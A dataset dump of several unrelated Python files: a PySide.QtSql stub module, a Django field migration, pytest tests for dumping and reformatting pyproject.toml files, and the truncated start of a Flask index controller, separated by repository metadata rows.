""" T.__new__(S, ...) -> a new object with type S, a subtype of T """
pass
def __repr__(self): # real signature unknown; restored from __doc__
""" x.__repr__() <==> repr(x) """
pass
ConnectionError = PySide.QtSql.QSqlError.ErrorType.ConnectionError
ErrorType = None # (!) real value is "<type 'PySide.QtSql.QSqlError.ErrorType'>"
NoError = PySide.QtSql.QSqlError.ErrorType.NoError
StatementError = PySide.QtSql.QSqlError.ErrorType.StatementError
TransactionError = PySide.QtSql.QSqlError.ErrorType.TransactionError
UnknownError = PySide.QtSql.QSqlError.ErrorType.UnknownError
class QSqlField(__Shiboken.Object):
# no doc
def clear(self, *args, **kwargs): # real signature unknown
pass
def defaultValue(self, *args, **kwargs): # real signature unknown
pass
def isAutoValue(self, *args, **kwargs): # real signature unknown
pass
def isGenerated(self, *args, **kwargs): # real signature unknown
pass
def isNull(self, *args, **kwargs): # real signature unknown
pass
def isReadOnly(self, *args, **kwargs): # real signature unknown
pass
def isValid(self, *args, **kwargs): # real signature unknown
pass
def length(self, *args, **kwargs): # real signature unknown
pass
def name(self, *args, **kwargs): # real signature unknown
pass
def precision(self, *args, **kwargs): # real signature unknown
pass
def requiredStatus(self, *args, **kwargs): # real signature unknown
pass
def setAutoValue(self, *args, **kwargs): # real signature unknown
pass
def setDefaultValue(self, *args, **kwargs): # real signature unknown
pass
def setGenerated(self, *args, **kwargs): # real signature unknown
pass
def setLength(self, *args, **kwargs): # real signature unknown
pass
def setName(self, *args, **kwargs): # real signature unknown
pass
def setPrecision(self, *args, **kwargs): # real signature unknown
pass
def setReadOnly(self, *args, **kwargs): # real signature unknown
pass
def setRequired(self, *args, **kwargs): # real signature unknown
pass
def setRequiredStatus(self, *args, **kwargs): # real signature unknown
pass
def setSqlType(self, *args, **kwargs): # real signature unknown
pass
def setType(self, *args, **kwargs): # real signature unknown
pass
def setValue(self, *args, **kwargs): # real signature unknown
pass
def type(self, *args, **kwargs): # real signature unknown
pass
def typeID(self, *args, **kwargs): # real signature unknown
pass
def value(self, *args, **kwargs): # real signature unknown
pass
def __copy__(self, *args, **kwargs): # real signature unknown
pass
def __eq__(self, y): # real signature unknown; restored from __doc__
""" x.__eq__(y) <==> x==y """
pass
def __ge__(self, y): # real signature unknown; restored from __doc__
""" x.__ge__(y) <==> x>=y """
pass
def __gt__(self, y): # real signature unknown; restored from __doc__
""" x.__gt__(y) <==> x>y """
pass
def __init__(self, *args, **kwargs): # real signature unknown
pass
def __le__(self, y): # real signature unknown; restored from __doc__
""" x.__le__(y) <==> x<=y """
pass
def __lt__(self, y): # real signature unknown; restored from __doc__
""" x.__lt__(y) <==> x<y """
pass
@staticmethod # known case of __new__
def __new__(S, *more): # real signature unknown; restored from __doc__
""" T.__new__(S, ...) -> a new object with type S, a subtype of T """
pass
def __ne__(self, y): # real signature unknown; restored from __doc__
""" x.__ne__(y) <==> x!=y """
pass
def __nonzero__(self): # real signature unknown; restored from __doc__
""" x.__nonzero__() <==> x != 0 """
pass
def __repr__(self): # real signature unknown; restored from __doc__
""" x.__repr__() <==> repr(x) """
pass
Optional = PySide.QtSql.QSqlField.RequiredStatus.Optional
Required = PySide.QtSql.QSqlField.RequiredStatus.Required
RequiredStatus = None # (!) real value is "<type 'PySide.QtSql.QSqlField.RequiredStatus'>"
Unknown = PySide.QtSql.QSqlField.RequiredStatus.Unknown
class QSqlRecord(__Shiboken.Object):
# no doc
def append(self, *args, **kwargs): # real signature unknown
pass
def clear(self, *args, **kwargs): # real signature unknown
pass
def clearValues(self, *args, **kwargs): # real signature unknown
pass
def contains(self, *args, **kwargs): # real signature unknown
pass
def count(self, *args, **kwargs): # real signature unknown
pass
def field(self, *args, **kwargs): # real signature unknown
pass
def fieldName(self, *args, **kwargs): # real signature unknown
pass
def indexOf(self, *args, **kwargs): # real signature unknown
pass
def insert(self, *args, **kwargs): # real signature unknown
pass
def isEmpty(self, *args, **kwargs): # real signature unknown
pass
def isGenerated(self, *args, **kwargs): # real signature unknown
pass
def isNull(self, *args, **kwargs): # real signature unknown
pass
def remove(self, *args, **kwargs): # real signature unknown
pass
def replace(self, *args, **kwargs): # real signature unknown
pass
def setGenerated(self, *args, **kwargs): # real signature unknown
pass
def setNull(self, *args, **kwargs): # real signature unknown
pass
def setValue(self, *args, **kwargs): # real signature unknown
pass
def value(self, *args, **kwargs): # real signature unknown
pass
def __copy__(self, *args, **kwargs): # real signature unknown
pass
def __eq__(self, y): # real signature unknown; restored from __doc__
""" x.__eq__(y) <==> x==y """
pass
def __ge__(self, y): # real signature unknown; restored from __doc__
""" x.__ge__(y) <==> x>=y """
pass
def __gt__(self, y): # real signature unknown; restored from __doc__
""" x.__gt__(y) <==> x>y """
pass
def __init__(self, *args, **kwargs): # real signature unknown
pass
def __le__(self, y): # real signature unknown; restored from __doc__
""" x.__le__(y) <==> x<=y """
pass
def __lt__(self, y): # real signature unknown; restored from __doc__
""" x.__lt__(y) <==> x<y """
pass
@staticmethod # known case of __new__
def __new__(S, *more): # real signature unknown; restored from __doc__
""" T.__new__(S, ...) -> a new object with type S, a subtype of T """
pass
def __ne__(self, y): # real signature unknown; restored from __doc__
""" x.__ne__(y) <==> x!=y """
pass
def __repr__(self): # real signature unknown; restored from __doc__
""" x.__repr__() <==> repr(x) """
pass
class QSqlIndex(QSqlRecord):
# no doc
def append(self, *args, **kwargs): # real signature unknown
pass
def cursorName(self, *args, **kwargs): # real signature unknown
pass
def isDescending(self, *args, **kwargs): # real signature unknown
pass
def name(self, *args, **kwargs): # real signature unknown
pass
def setCursorName(self, *args, **kwargs): # real signature unknown
pass
def setDescending(self, *args, **kwargs): # real signature unknown
pass
def setName(self, *args, **kwargs): # real signature unknown
pass
def __copy__(self, *args, **kwargs): # real signature unknown
pass
def __init__(self, *args, **kwargs): # real signature unknown
pass
@staticmethod # known case of __new__
def __new__(S, *more): # real signature unknown; restored from __doc__
""" T.__new__(S, ...) -> a new object with type S, a subtype of T """
pass
class QSqlQuery(__Shiboken.Object):
# no doc
def addBindValue(self, *args, **kwargs): # real signature unknown
pass
def at(self, *args, **kwargs): # real signature unknown
pass
def bindValue(self, *args, **kwargs): # real signature unknown
pass
def boundValue(self, *args, **kwargs): # real signature unknown
pass
def boundValues(self, *args, **kwargs): # real signature unknown
pass
def clear(self, *args, **kwargs): # real signature unknown
pass
def driver(self, *args, **kwargs): # real signature unknown
pass
def execBatch(self, *args, **kwargs): # real signature unknown
pass
def executedQuery(self, *args, **kwargs): # real signature unknown
pass
def exec_(self, *args, **kwargs): # real signature unknown
pass
def finish(self, *args, **kwargs): # real signature unknown
pass
def first(self, *args, **kwargs): # real signature unknown
pass
def isActive(self, *args, **kwargs): # real signature unknown
pass
def isForwardOnly(self, *args, **kwargs): # real signature unknown
pass
def isNull(self, *args, **kwargs): # real signature unknown
pass
def isSelect(self, *args, **kwargs): # real signature unknown
pass
def isValid(self, *args, **kwargs): # real signature unknown
pass
def last(self, *args, **kwargs): # real signature unknown
pass
def lastError(self, *args, **kwargs): # real signature unknown
pass
def lastInsertId(self, *args, **kwargs): # real signature unknown
pass
def lastQuery(self, *args, **kwargs): # real signature unknown
pass
def next(self, *args, **kwargs): # real signature unknown
pass
def nextResult(self, *args, **kwargs): # real signature unknown
pass
def numericalPrecisionPolicy(self, *args, **kwargs): # real signature unknown
pass
def numRowsAffected(self, *args, **kwargs): # real signature unknown
pass
def prepare(self, *args, **kwargs): # real signature unknown
pass
def previous(self, *args, **kwargs): # real signature unknown
pass
def record(self, *args, **kwargs): # real signature unknown
pass
def result(self, *args, **kwargs): # real signature unknown
pass
def seek(self, *args, **kwargs): # real signature unknown
pass
def setForwardOnly(self, *args, **kwargs): # real signature unknown
pass
def setNumericalPrecisionPolicy(self, *args, **kwargs): # real signature unknown
pass
def size(self, *args, **kwargs): # real signature unknown
pass
def value(self, *args, **kwargs): # real signature unknown
pass
def __copy__(self, *args, **kwargs): # real signature unknown
pass
def __init__(self, *args, **kwargs): # real signature unknown
pass
@staticmethod # known case of __new__
def __new__(S, *more): # real signature unknown; restored from __doc__
""" T.__new__(S, ...) -> a new object with type S, a subtype of T """
pass
BatchExecutionMode = None # (!) real value is "<type 'PySide.QtSql.QSqlQuery.BatchExecutionMode'>"
ValuesAsColumns = PySide.QtSql.QSqlQuery.BatchExecutionMode.ValuesAsColumns
ValuesAsRows = PySide.QtSql.QSqlQuery.BatchExecutionMode.ValuesAsRows
class QSqlQueryModel(__PySide_QtCore.QAbstractTableModel):
# no doc
def canFetchMore(self, *args, **kwargs): # real signature unknown
pass
def clear(self, *args, **kwargs): # real signature unknown
pass
def columnCount(self, *args, **kwargs): # real signature unknown
pass
def data(self, *args, **kwargs): # real signature unknown
pass
def fetchMore(self, *args, **kwargs): # real signature unknown
pass
def headerData(self, *args, **kwargs): # real signature unknown
pass
def indexInQuery(self, *args, **kwargs): # real signature unknown
pass
def insertColumns(self, *args, **kwargs): # real signature unknown
pass
def lastError(self, *args, **kwargs): # real signature unknown
pass
def query(self, *args, **kwargs): # real signature unknown
pass
def queryChange(self, *args, **kwargs): # real signature unknown
pass
def record(self, *args, **kwargs): # real signature unknown
pass
def removeColumns(self, *args, **kwargs): # real signature unknown
pass
def rowCount(self, *args, **kwargs): # real signature unknown
pass
def setHeaderData(self, *args, **kwargs): # real signature unknown
pass
def setLastError(self, *args, **kwargs): # real signature unknown
pass
def setQuery(self, *args, **kwargs): # real signature unknown
pass
def __init__(self, *args, **kwargs): # real signature unknown
pass
@staticmethod # known case of __new__
def __new__(S, *more): # real signature unknown; restored from __doc__
""" T.__new__(S, ...) -> a new object with type S, a subtype of T """
pass
staticMetaObject = None # (!) real value is '<PySide.QtCore.QMetaObject object at 0x00000000047E1548>'
class QSqlRelation(__Shiboken.Object):
# no doc
def displayColumn(self, *args, **kwargs): # real signature unknown
pass
def indexColumn(self, *args, **kwargs): # real signature unknown
pass
def isValid(self, *args, **kwargs): # real signature unknown
pass
def tableName(self, *args, **kwargs): # real signature unknown
pass
def __copy__(self, *args, **kwargs): # real signature unknown
pass
def __init__(self, *args, **kwargs): # real signature unknown
pass
@staticmethod # known case of __new__
def __new__(S, *more): # real signature unknown; restored from __doc__
""" T.__new__(S, ...) -> a new object with type S, a subtype of T """
pass
class QSqlRelationalDelegate(__PySide_QtGui.QItemDelegate):
# no doc
def createEditor(self, *args, **kwargs): # real signature unknown
pass
def setEditorData(self, *args, **kwargs): # real signature unknown
pass
def setModelData(self, *args, **kwargs): # real signature unknown
pass
def __init__(self, *args, **kwargs): # real signature unknown
pass
@staticmethod # known case of __new__
def __new__(S, *more): # real signature unknown; restored from __doc__
""" T.__new__(S, ...) -> a new object with type S, a subtype of T """
pass
staticMetaObject = None # (!) real value is '<PySide.QtCore.QMetaObject object at 0x000000000476BD08>'
class QSqlTableModel(QSqlQueryModel):
# no doc
def beforeDelete(self, *args, **kwargs): # real signature unknown
""" Signal """
pass
def beforeInsert(self, *args, **kwargs): # real signature unknown
""" Signal """
pass
def beforeUpdate(self, *args, **kwargs): # real signature unknown
""" Signal """
pass
def clear(self, *args, **kwargs): # real signature unknown
pass
def data(self, *args, **kwargs): # real signature unknown
pass
def database(self, *args, **kwargs): # real signature unknown
pass
def deleteRowFromTable(self, *args, **kwargs): # real signature unknown
pass
def editStrategy(self, *args, **kwargs): # real signature unknown
pass
def fieldIndex(self, *args, **kwargs): # real signature unknown
pass
def filter(self, *args, **kwargs): # real signature unknown
pass
def flags(self, *args, **kwargs): # real signature unknown
pass
def headerData(self, *args, **kwargs): # real signature unknown
pass
def indexInQuery(self, *args, **kwargs): # real signature unknown
pass
def insertRecord(self, *args, **kwargs): # real signature unknown
pass
def insertRowIntoTable(self, *args, **kwargs): # real signature unknown
pass
def insertRows(self, *args, **kwargs): # real signature unknown
pass
def isDirty(self, *args, **kwargs): # real signature unknown
pass
def orderByClause(self, *args, **kwargs): # real signature unknown
pass
def primaryKey(self, *args, **kwargs): # real signature unknown
pass
def primeInsert(self, *args, **kwargs): # real signature unknown
""" Signal """
pass
def removeColumns(self, *args, **kwargs): # real signature unknown
pass
def removeRows(self, *args, **kwargs): # real signature unknown
pass
def revert(self, *args, **kwargs): # real signature unknown
pass
def revertAll(self, *args, **kwargs): # real signature unknown
pass
def revertRow(self, *args, **kwargs): # real signature unknown
pass
def rowCount(self, *args, **kwargs): # real signature unknown
pass
def select(self, *args, **kwargs): # real signature unknown
pass
def selectStatement(self, *args, **kwargs): # real signature unknown
pass
def setData(self, *args, **kwargs): # real signature unknown
pass
def setEditStrategy(self, *args, **kwargs): # real signature unknown
pass
def setFilter(self, *args, **kwargs): # real signature unknown
pass
def setPrimaryKey(self, *args, **kwargs): # real signature unknown
pass
def setQuery(self, *args, **kwargs): # real signature unknown
pass
def setRecord(self, *args, **kwargs): # real signature unknown
pass
def setSort(self, *args, **kwargs): # real signature unknown
pass
def setTable(self, *args, **kwargs): # real signature unknown
pass
def sort(self, *args, **kwargs): # real signature unknown
pass
def submit(self, *args, **kwargs): # real signature unknown
pass
def submitAll(self, *args, **kwargs): # real signature unknown
pass
def tableName(self, *args, **kwargs): # real signature unknown
pass
def updateRowInTable(self, *args, **kwargs): # real signature unknown
pass
def __init__(self, *args, **kwargs): # real signature unknown
pass
@staticmethod # known case of __new__
def __new__(S, *more): # real signature unknown; restored from __doc__
""" T.__new__(S, ...) -> a new object with type S, a subtype of T """
pass
EditStrategy = None # (!) real value is "<type 'PySide.QtSql.QSqlTableModel.EditStrategy'>"
OnFieldChange = PySide.QtSql.QSqlTableModel.EditStrategy.OnFieldChange
OnManualSubmit = PySide.QtSql.QSqlTableModel.EditStrategy.OnManualSubmit
OnRowChange = PySide.QtSql.QSqlTableModel.EditStrategy.OnRowChange
staticMetaObject = None # (!) real value is '<PySide.QtCore.QMetaObject object at 0x00000000047E22C8>'
class QSqlRelationalTableModel(QSqlTableModel):
# no doc
def clear(self, *args, **kwargs): # real signature unknown
pass
def data(self, *args, **kwargs): # real signature unknown
pass
def insertRowIntoTable(self, *args, **kwargs): # real signature unknown
pass
def orderByClause(self, *args, **kwargs): # real signature unknown
pass
def relation(self, *args, **kwargs): # real signature unknown
pass
def relationModel(self, *args, **kwargs): # real signature unknown
pass
def removeColumns(self, *args, **kwargs): # real signature unknown
pass
def revertRow(self, *args, **kwargs): # real signature unknown
pass
def select(self, *args, **kwargs): # real signature unknown
pass
def selectStatement(self, *args, **kwargs): # real signature unknown
pass
def setData(self, *args, **kwargs): # real signature unknown
pass
def setRelation(self, *args, **kwargs): # real signature unknown
pass
def setTable(self, *args, **kwargs): # real signature unknown
pass
def updateRowInTable(self, *args, **kwargs): # real signature unknown
pass
def __init__(self, *args, **kwargs): # real signature unknown
pass
@staticmethod # known case of __new__
def __new__(S, *more): # real signature unknown; restored from __doc__
""" T.__new__(S, ...) -> a new object with type S, a subtype of T """
pass
staticMetaObject = None # (!) real value is '<PySide.QtCore.QMetaObject object at 0x00000000047E2748>'
class QSqlResult(__Shiboken.Object):
# no doc
def addBindValue(self, *args, **kwargs): # real signature unknown
pass
def at(self, *args, **kwargs): # real signature unknown
pass
def bindingSyntax(self, *args, **kwargs): # real signature unknown
pass
def bindValue(self, *args, **kwargs): # real signature unknown
pass
def bindValueType(self, *args, **kwargs): # real signature unknown
pass
def boundValue(self, *args, **kwargs): # real signature unknown
pass
def boundValueCount(self, *args, **kwargs): # real signature unknown
pass
def boundValueName(self, *args, **kwargs): # real signature unknown
pass
def boundValues(self, *args, **kwargs): # real signature unknown
pass
def clear(self, *args, **kwargs): # real signature unknown
pass
def data(self, *args, **kwargs): # real signature unknown
pass
def detachFromResultSet(self, *args, **kwargs): # real signature unknown
pass
def driver(self, *args, **kwargs): # real signature unknown
pass
def execBatch(self, *args, **kwargs): # real signature unknown
pass
def executedQuery(self, *args, **kwargs): # real signature unknown
pass
def exec_(self, *args, **kwargs): # real signature unknown
pass
def fetch(self, *args, **kwargs): # real signature unknown
pass
def fetchFirst(self, *args, **kwargs): # real signature unknown
pass
def fetchLast(self, *args, **kwargs): # real signature unknown
pass
def fetchNext(self, *args, **kwargs): # real signature unknown
pass
def fetchPrevious(self, *args, **kwargs): # real signature unknown
pass
def handle(self, *args, **kwargs): # real signature unknown
pass
def hasOutValues(self, *args, **kwargs): # real signature unknown
pass
def isActive(self, *args, **kwargs): # real signature unknown
pass
def isForwardOnly(self, *args, **kwargs): # real signature unknown
pass
def isNull(self, *args, **kwargs): # real signature unknown
pass
def isSelect(self, *args, **kwargs): # real signature unknown
pass
def isValid(self, *args, **kwargs): # real signature unknown
pass
def lastError(self, *args, **kwargs): # real signature unknown
pass
def lastInsertId(self, *args, **kwargs): # real signature unknown
pass
def lastQuery(self, *args, **kwargs): # real signature unknown
pass
def nextResult(self, *args, **kwargs): # real signature unknown
pass
def numericalPrecisionPolicy(self, *args, **kwargs): # real signature unknown
pass
def numRowsAffected(self, *args, **kwargs): # real signature unknown
pass
def prepare(self, *args, **kwargs): # real signature unknown
pass
def record(self, *args, **kwargs): # real signature unknown
pass
def reset(self, *args, **kwargs): # real signature unknown
pass
def savePrepare(self, *args, **kwargs): # real signature unknown
pass
def setActive(self, *args, **kwargs): # real signature unknown
pass
def setAt(self, *args, **kwargs): # real signature unknown
pass
def setForwardOnly(self, *args, **kwargs): # real signature unknown
pass
def setLastError(self, *args, **kwargs): # real signature unknown
pass
def setNumericalPrecisionPolicy(self, *args, **kwargs): # real signature unknown
pass
def setQuery(self, *args, **kwargs): # real signature unknown
pass
def setSelect(self, *args, **kwargs): # real signature unknown
pass
def size(self, *args, **kwargs): # real signature unknown
pass
def __init__(self, *args, **kwargs): # real signature unknown
pass
@staticmethod # known case of __new__
def __new__(S, *more): # real signature unknown; restored from __doc__
""" T.__new__(S, ...) -> a new object with type S, a subtype of T """
pass
BatchOperation = PySide.QtSql.QSqlResult.VirtualHookOperation.BatchOperation
BindingSyntax = None # (!) real value is "<type 'PySide.QtSql.QSqlResult.BindingSyntax'>"
DetachFromResultSet = PySide.QtSql.QSqlResult.VirtualHookOperation.DetachFromResultSet
NamedBinding = PySide.QtSql.QSqlResult.BindingSyntax.NamedBinding
NextResult = PySide.QtSql.QSqlResult.VirtualHookOperation.NextResult
PositionalBinding = PySide.QtSql.QSqlResult.BindingSyntax.PositionalBinding
SetNumericalPrecision = PySide.QtSql.QSqlResult.VirtualHookOperation.SetNumericalPrecision
VirtualHookOperation = None # (!) real value is "<type 'PySide.QtSql.QSqlResult.VirtualHookOperation'>"
| 30.686434 | 109 | 0.644818 | 4,151 | 37,775 | 5.733799 | 0.085522 | 0.188437 | 0.289904 | 0.237469 | 0.767867 | 0.742826 | 0.742826 | 0.737784 | 0.584177 | 0.573295 | 0 | 0.00326 | 0.244818 | 37,775 | 1,230 | 110 | 30.711382 | 0.831072 | 0.312852 | 0 | 0.707286 | 0 | 0 | 0.000987 | 0.000987 | 0 | 0 | 0 | 0 | 0 | 1 | 0.433417 | false | 0.43593 | 0.003769 | 0 | 0.548995 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 9 |
05dc2074721141f00b34044df711a3da9d355caa | 2,008 | py | Python | app/migrations/0005_auto_20210809_1700.py | Satyam-Raj/upload_resume | c2061afadcfe3f2d29abab3aac3c86f2e9c92520 | [
"MIT"
] | 1 | 2021-09-26T11:33:42.000Z | 2021-09-26T11:33:42.000Z | app/migrations/0005_auto_20210809_1700.py | Satyam-Raj/Ultimate | caee13349338062ef1153d9a9292b9bf6a755603 | [
"MIT"
] | null | null | null | app/migrations/0005_auto_20210809_1700.py | Satyam-Raj/Ultimate | caee13349338062ef1153d9a9292b9bf6a755603 | [
"MIT"
] | null | null | null | # Generated by Django 3.2.5 on 2021-08-09 11:30
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('app', '0004_auto_20210809_1641'),
]
operations = [
migrations.AlterField(
model_name='professional',
name='Fifth_Skill',
field=models.CharField(blank=True, max_length=120),
),
migrations.AlterField(
model_name='professional',
name='First_Skill',
field=models.CharField(max_length=120, null=True),
),
migrations.AlterField(
model_name='professional',
name='Fist_Language',
field=models.CharField(max_length=112, null=True),
),
migrations.AlterField(
model_name='professional',
name='Fourth_Skill',
field=models.CharField(blank=True, max_length=120),
),
migrations.AlterField(
model_name='professional',
name='Second_Language',
field=models.CharField(blank=True, max_length=112),
),
migrations.AlterField(
model_name='professional',
name='Second_Skill',
field=models.CharField(max_length=120, null=True),
),
migrations.AlterField(
model_name='professional',
name='Seventh_Skill',
field=models.CharField(blank=True, max_length=120),
),
migrations.AlterField(
model_name='professional',
name='Sixth_Skill',
field=models.CharField(blank=True, max_length=120),
),
migrations.AlterField(
model_name='professional',
name='Third_Language',
field=models.CharField(blank=True, max_length=112),
),
migrations.AlterField(
model_name='professional',
name='Third_Skill',
field=models.CharField(max_length=120, null=True),
),
]
| 31.375 | 63 | 0.571713 | 189 | 2,008 | 5.899471 | 0.259259 | 0.179372 | 0.224215 | 0.26009 | 0.830493 | 0.804484 | 0.764126 | 0.744395 | 0.696861 | 0.656502 | 0 | 0.044396 | 0.315737 | 2,008 | 63 | 64 | 31.873016 | 0.767103 | 0.02241 | 0 | 0.684211 | 1 | 0 | 0.137175 | 0.011729 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.017544 | 0 | 0.070175 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
af17407dfba024ee7d39a50ba72d0915bba320c9 | 5,884 | py | Python | tests/test_dumping.py | repo-helper/pyproject-parser | fe38755dff1c735761194e1e57da4de2aa0f83f9 | [
"MIT"
] | 2 | 2021-09-20T10:09:34.000Z | 2021-12-26T01:15:59.000Z | tests/test_dumping.py | repo-helper/pyproject-parser | fe38755dff1c735761194e1e57da4de2aa0f83f9 | [
"MIT"
] | 11 | 2021-04-11T08:49:54.000Z | 2022-02-05T16:41:21.000Z | tests/test_dumping.py | repo-helper/pyproject-parser | fe38755dff1c735761194e1e57da4de2aa0f83f9 | [
"MIT"
] | null | null | null | # 3rd party
import pytest
from coincidence.regressions import AdvancedFileRegressionFixture
from domdf_python_tools.paths import PathPlus
from pyproject_examples.example_configs import COMPLETE_A, COMPLETE_A_WITH_FILES, COMPLETE_B, COMPLETE_PROJECT_A
# this package
from pyproject_parser import PyProject
UNORDERED = """\
[project]
keywords = [ "pep517", "pep621", "build", "sdist", "wheel", "packaging", "distribution",]
version = "2021.0.0"
description = "A simple Python wheel builder for simple projects."
dynamic = [ "classifiers", "requires-python",]
dependencies = [
"httpx",
"gidgethub[httpx]>4.0.0",
"django>2.1; os_name != 'nt'",
"django>2.0; os_name == 'nt'"
]
name = "whey"
[build-system]
requires = [ "whey",]
build-backend = "whey"
[project.urls]
Homepage = "https://whey.readthedocs.io/en/latest"
Documentation = "https://whey.readthedocs.io/en/latest"
"Issue Tracker" = "https://github.com/repo-helper/whey/issues"
"Source Code" = "https://github.com/repo-helper/whey"
[tool.whey]
base-classifiers = [ "Development Status :: 4 - Beta",]
python-versions = [ "3.6", "3.7", "3.8", "3.9", "3.10",]
python-implementations = [ "CPython", "PyPy",]
platforms = [ "Windows", "macOS", "Linux",]
license-key = "MIT"
[[project.authors]]
email = "dominic@davis-foster.co.uk"
name = "Dominic Davis-Foster"
"""
DUMPS_README_TEMPLATE = """\
[build-system]
requires = [ "whey",]
build-backend = "whey"
[project]
name = "Whey"
version = "2021.0.0"
description = "A simple Python wheel builder for simple projects."
keywords = [ "pep517", "pep621", "build", "sdist", "wheel", "packaging", "distribution",]
dynamic = [ "classifiers", "requires-python",]
dependencies = [
"httpx",
"gidgethub[httpx]>4.0.0",
"django>2.1; os_name != 'nt'",
"django>2.0; os_name == 'nt'"
]
{readme_block}
[[project.authors]]
email = "dominic@davis-foster.co.uk"
name = "Dominic Davis-Foster"
[project.urls]
Homepage = "https://whey.readthedocs.io/en/latest"
Documentation = "https://whey.readthedocs.io/en/latest"
"Issue Tracker" = "https://github.com/repo-helper/whey/issues"
"Source Code" = "https://github.com/repo-helper/whey"
"""
COMPLETE_UNDERSCORE_NAME = """\
[build-system]
requires = [ "whey",]
build-backend = "whey"
[project]
name = "toctree_plus"
version = "2021.0.0"
description = "A simple Python wheel builder for simple projects."
keywords = [ "pep517", "pep621", "build", "sdist", "wheel", "packaging", "distribution",]
dynamic = [ "classifiers", "requires-python",]
dependencies = [
"httpx",
"gidgethub[httpx]>4.0.0",
"django>2.1; os_name != 'nt'",
"django>2.0; os_name == 'nt'"
]
[[project.authors]]
email = "dominic@davis-foster.co.uk"
name = "Dominic Davis-Foster"
[project.urls]
Homepage = "https://whey.readthedocs.io/en/latest"
Documentation = "https://whey.readthedocs.io/en/latest"
"Issue Tracker" = "https://github.com/repo-helper/whey/issues"
"Source Code" = "https://github.com/repo-helper/whey"
[tool.whey]
base-classifiers = [ "Development Status :: 4 - Beta",]
python-versions = [ "3.6", "3.7", "3.8", "3.9", "3.10",]
python-implementations = [ "CPython", "PyPy",]
platforms = [ "Windows", "macOS", "Linux",]
license-key = "MIT"
package = "whey"
"""
@pytest.mark.parametrize(
"toml_string",
[
pytest.param(COMPLETE_A, id="COMPLETE_A"),
pytest.param(COMPLETE_B, id="COMPLETE_B"),
pytest.param(COMPLETE_PROJECT_A, id="COMPLETE_PROJECT_A"),
]
)
def test_dumps(
tmp_pathplus: PathPlus,
toml_string: str,
advanced_file_regression: AdvancedFileRegressionFixture,
):
(tmp_pathplus / "pyproject.toml").write_clean(toml_string)
config = PyProject.load(filename=tmp_pathplus / "pyproject.toml")
config.dump(tmp_pathplus / "pyproject.toml")
advanced_file_regression.check_file(tmp_pathplus / "pyproject.toml")
advanced_file_regression.check(config.dumps(), extension=".toml")
def _param(readme_block: str, **kwargs):
return pytest.param(DUMPS_README_TEMPLATE.format(readme_block=readme_block), **kwargs)
@pytest.mark.parametrize(
"toml_string",
[
_param(readme_block="readme = 'README.rst'", id="string"),
_param(
readme_block="[project.readme]\ntext = 'This is the README'\ncontent-type = 'text/x-rst'",
id="dict_text"
),
_param(
readme_block="[project.readme]\nfile = 'README.rst'\ncontent-type = 'text/x-rst'",
id="dict_file"
),
]
)
def test_dumps_readme(
tmp_pathplus: PathPlus,
toml_string: str,
advanced_file_regression: AdvancedFileRegressionFixture,
):
(tmp_pathplus / "pyproject.toml").write_clean(toml_string)
(tmp_pathplus / "README.rst").write_clean("This is the README")
config = PyProject.load(filename=tmp_pathplus / "pyproject.toml")
config.dump(tmp_pathplus / "pyproject.toml")
advanced_file_regression.check_file(tmp_pathplus / "pyproject.toml")
advanced_file_regression.check(config.dumps(), extension=".toml")
@pytest.mark.parametrize(
"toml_string",
[
pytest.param(COMPLETE_A, id="COMPLETE_A"),
pytest.param(COMPLETE_A_WITH_FILES, id="COMPLETE_A_WITH_FILES"),
pytest.param(COMPLETE_B, id="COMPLETE_B"),
pytest.param(COMPLETE_PROJECT_A, id="COMPLETE_PROJECT_A"),
pytest.param(UNORDERED, id="UNORDERED"),
pytest.param(COMPLETE_UNDERSCORE_NAME, id="COMPLETE_UNDERSCORE_NAME"),
]
)
def test_reformat(
tmp_pathplus: PathPlus,
toml_string: str,
advanced_file_regression: AdvancedFileRegressionFixture,
):
(tmp_pathplus / "pyproject.toml").write_clean(toml_string)
(tmp_pathplus / "README.rst").write_clean("This is the README")
(tmp_pathplus / "LICENSE").write_clean("This is the LICENSE")
PyProject.reformat(tmp_pathplus / "pyproject.toml")
advanced_file_regression.check_file(tmp_pathplus / "pyproject.toml")
# Should be no changes
PyProject.reformat(tmp_pathplus / "pyproject.toml")
advanced_file_regression.check_file(tmp_pathplus / "pyproject.toml")
| 29.128713 | 112 | 0.708022 | 746 | 5,884 | 5.418231 | 0.202413 | 0.051707 | 0.064325 | 0.07719 | 0.815933 | 0.789213 | 0.789213 | 0.776348 | 0.752845 | 0.728105 | 0 | 0.015867 | 0.121686 | 5,884 | 201 | 113 | 29.273632 | 0.766254 | 0.007308 | 0 | 0.759259 | 0 | 0.04321 | 0.587631 | 0.058078 | 0 | 0 | 0 | 0 | 0 | 1 | 0.024691 | false | 0 | 0.030864 | 0.006173 | 0.061728 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
af337e8e4d62809bec07e037a06660807b8abcb5 | 2,356 | py | Python | controllers/index.py | andrelrg/blog | fbaf007566a4d846636371d79e3a831582ea1ef5 | [
"MIT"
] | null | null | null | controllers/index.py | andrelrg/blog | fbaf007566a4d846636371d79e3a831582ea1ef5 | [
"MIT"
] | null | null | null | controllers/index.py | andrelrg/blog | fbaf007566a4d846636371d79e3a831582ea1ef5 | [
"MIT"
] | null | null | null | from flask import render_template
class Index:
def index():
posts = [
{
"title": "Teste post do role",
